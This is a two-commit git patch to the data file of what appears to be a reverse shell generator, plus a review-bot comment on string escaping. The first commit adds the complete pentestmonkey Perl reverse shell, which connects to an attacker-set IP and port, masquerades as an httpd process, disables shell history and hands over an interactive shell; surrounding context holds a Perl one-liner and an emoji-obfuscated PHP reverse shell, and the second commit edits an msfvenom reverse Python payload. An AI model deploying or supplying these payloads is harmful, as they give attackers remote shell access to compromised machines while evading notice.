From 63978e4b9e7706f9be2399dee3d0cbea1b6c2c9b Mon Sep 17 00:00:00 2001
From: Alvin Smith
Date: Tue, 11 Oct 2022 12:30:34 +1300
Subject: [PATCH 1/2] Update data.js with new Perl PentestMonkey

Add Perl PentestMonkey
---
 js/data.js | 5 +++++
 1 file changed, 5 insertions(+)

diff --git a/js/data.js b/js/data.js
index dd8a197..817c7ff 100644
--- a/js/data.js
+++ b/js/data.js
@@ -120,6 +120,11 @@ const reverseShellCommands = withCommandType( "command": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{ip}:{port}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'", "meta": ["linux", "mac"] }, + { + "name": "Perl PentestMonkey", + "command": `#!/usr/bin/perl -w\n# perl-reverse-shell - A Reverse Shell implementation in PERL\n# Copyright (C) 2006 pentestmonkey@pentestmonkey.net\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. The author accepts no liability\n# for damage caused by this tool. If these terms are not acceptable to you, then\n# do not use this tool.\n#\n# In all other respects the GPL version 2 applies:\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2 as\n# published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License along\n# with this program; if not, write to the Free Software Foundation, Inc.,\n# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n# This tool may be used for legal purposes only. Users take full responsibility\n# for any actions performed using this tool. 
If these terms are not acceptable to\n# you, then do not use this tool.\n#\n# You are encouraged to send comments, improvements or suggestions to\n# me at pentestmonkey@pentestmonkey.net\n#\n# Description\n# -----------\n# This script will make an outbound TCP connection to a hardcoded IP and port.\n# The recipient will be given a shell running as the current user (apache normally).\n#\n\nuse strict;\nuse Socket;\nuse FileHandle;\nuse POSIX;\nmy $VERSION = "1.0";\n\n# Where to send the reverse shell. Change these.\nmy $ip = '{ip}';\nmy $port = {port};\n\n# Options\nmy $daemon = 1;\nmy $auth = 0; # 0 means authentication is disabled and any \n # source IP can access the reverse shell\nmy $authorised_client_pattern = qr(^127\\.0\\.0\\.1$);\n\n# Declarations\nmy $global_page = "";\nmy $fake_process_name = "/usr/sbin/apache";\n\n# Change the process name to be less conspicious\n$0 = "[httpd]";\n\n# Authenticate based on source IP address if required\nif (defined($ENV{'REMOTE_ADDR'})) {\n cgiprint("Browser IP address appears to be: $ENV{'REMOTE_ADDR'}");\n\n if ($auth) {\n unless ($ENV{'REMOTE_ADDR'} =~ $authorised_client_pattern) {\n cgiprint("ERROR: Your client isn't authorised to view this page");\n cgiexit();\n }\n }\n} elsif ($auth) {\n cgiprint("ERROR: Authentication is enabled, but I couldn't determine your IP address. 
Denying access");\n cgiexit(0);\n}\n\n# Background and dissociate from parent process if required\nif ($daemon) {\n my $pid = fork();\n if ($pid) {\n cgiexit(0); # parent exits\n }\n\n setsid();\n chdir('/');\n umask(0);\n}\n\n# Make TCP connection for reverse shell\nsocket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));\nif (connect(SOCK, sockaddr_in($port,inet_aton($ip)))) {\n cgiprint("Sent reverse shell to $ip:$port");\n cgiprintpage();\n} else {\n cgiprint("Couldn't open reverse shell to $ip:$port: $!");\n cgiexit(); \n}\n\n# Redirect STDIN, STDOUT and STDERR to the TCP connection\nopen(STDIN, ">&SOCK");\nopen(STDOUT,">&SOCK");\nopen(STDERR,">&SOCK");\n$ENV{'HISTFILE'} = '/dev/null';\nsystem("w;uname -a;id;pwd");\nexec({"{shell}"} ($fake_process_name, "-i"));\n\n# Wrapper around print\nsub cgiprint {\n my $line = shift;\n $line .= "

\\n";\n $global_page .= $line;\n}\n\n# Wrapper around exit\nsub cgiexit {\n cgiprintpage();\n exit 0; # 0 to ensure we don't give a 500 response.\n}\n\n# Form HTTP response using all the messages gathered by cgiprint so far\nsub cgiprintpage {\n print "Content-Length: " . length($global_page) . "\\r\nConnection: close\\r\nContent-Type: text\\/html\\r\\n\\r\\n" . $global_page;\n}\n`, + "meta": ["linux", "mac"] + }, { "name": "PHP Emoji", "command": "php -r '$๐Ÿ˜€=\"1\";$๐Ÿ˜=\"2\";$๐Ÿ˜…=\"3\";$๐Ÿ˜†=\"4\";$๐Ÿ˜‰=\"5\";$๐Ÿ˜Š=\"6\";$๐Ÿ˜Ž=\"7\";$๐Ÿ˜=\"8\";$๐Ÿ˜š=\"9\";$๐Ÿ™‚=\"0\";$๐Ÿคข=\" \";$๐Ÿค“=\"<\";$๐Ÿค =\">\";$๐Ÿ˜ฑ=\"-\";$๐Ÿ˜ต=\"&\";$๐Ÿคฉ=\"i\";$๐Ÿค”=\".\";$๐Ÿคจ=\"/\";$๐Ÿฅฐ=\"a\";$๐Ÿ˜=\"b\";$๐Ÿ˜ถ=\"i\";$๐Ÿ™„=\"h\";$๐Ÿ˜‚=\"c\";$๐Ÿคฃ=\"d\";$๐Ÿ˜ƒ=\"e\";$๐Ÿ˜„=\"f\";$๐Ÿ˜‹=\"k\";$๐Ÿ˜˜=\"n\";$๐Ÿ˜—=\"o\";$๐Ÿ˜™=\"p\";$๐Ÿค—=\"s\";$๐Ÿ˜‘=\"x\";$๐Ÿ’€ = $๐Ÿ˜„. $๐Ÿค—. $๐Ÿ˜—. $๐Ÿ˜‚. $๐Ÿ˜‹. $๐Ÿ˜—. $๐Ÿ˜™. $๐Ÿ˜ƒ. $๐Ÿ˜˜;$๐Ÿš€ = \"{ip}\";$๐Ÿ’ป = {port};$๐Ÿš = \"{shell}\". $๐Ÿคข. $๐Ÿ˜ฑ. $๐Ÿคฉ. $๐Ÿคข. $๐Ÿค“. $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…. $๐Ÿคข. $๐Ÿ˜. $๐Ÿค . $๐Ÿ˜ต. $๐Ÿ˜…;$๐Ÿคฃ = $๐Ÿ’€($๐Ÿš€,$๐Ÿ’ป);$๐Ÿ‘ฝ = $๐Ÿ˜ƒ. $๐Ÿ˜‘. $๐Ÿ˜ƒ. $๐Ÿ˜‚;$๐Ÿ‘ฝ($๐Ÿš);'", From 7b86264ecdc835a1f65d699525a34cdcb6a35af4 Mon Sep 17 00:00:00 2001 From: Alvin Smith Date: Tue, 11 Oct 2022 13:01:00 +1300 Subject: [PATCH 2/2] Update data.js Fix the Python Stageless Reverse TCP output file extension error https://github.com/0dayCTF/reverse-shell-generator/issues/96 --- js/data.js | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/js/data.js b/js/data.js index 817c7ff..a9cbe52 100644 --- a/js/data.js +++ b/js/data.js @@ -440,7 +440,7 @@ const msfvenomCommands = withCommandType( }, { "name": "Python Stageless Reverse TCP", - "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw -o shell.py", + "command": "msfvenom -p cmd/unix/reverse_python LHOST={ip} LPORT={port} -f raw", "meta": ["msfvenom", "windows", "linux", "stageless", "reverse"] }, {
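Review bot: The escaping inside the new backtick template literal is inconsistent in `cgiprintpage`: the header string uses `\\r\n` twice and `\\r\\n` twice, and because a JS template literal turns `\n` into a real newline, the generated Perl ends up with a double-quoted string that spans lines with a bare LF (it still emits CRLF since Perl expands `\r`, but it no longer matches the upstream script and is hard to read). I would write that line uniformly as `print "Content-Length: " . length($global_page) . "\\r\\nConnection: close\\r\\nContent-Type: text/html\\r\\n\\r\\n" . $global_page;` (the `\\/` in `text\\/html` is also unnecessary, `/` needs no escape in a Perl double-quoted string). The `$line .= "` statement in `cgiprint` appears in this view with a raw line break before `\\n";` — if that break is really in the literal rather than an artifact of how the patch was rendered, the generated Perl appends stray newlines and the intended form is `$line .= "\\n";`. Since this entry is the only backtick literal among double-quoted siblings, a short comment on the entry noting that `${...}` inside it would be interpolated by JS (none occurs in the script today) would save the next editor from that trap.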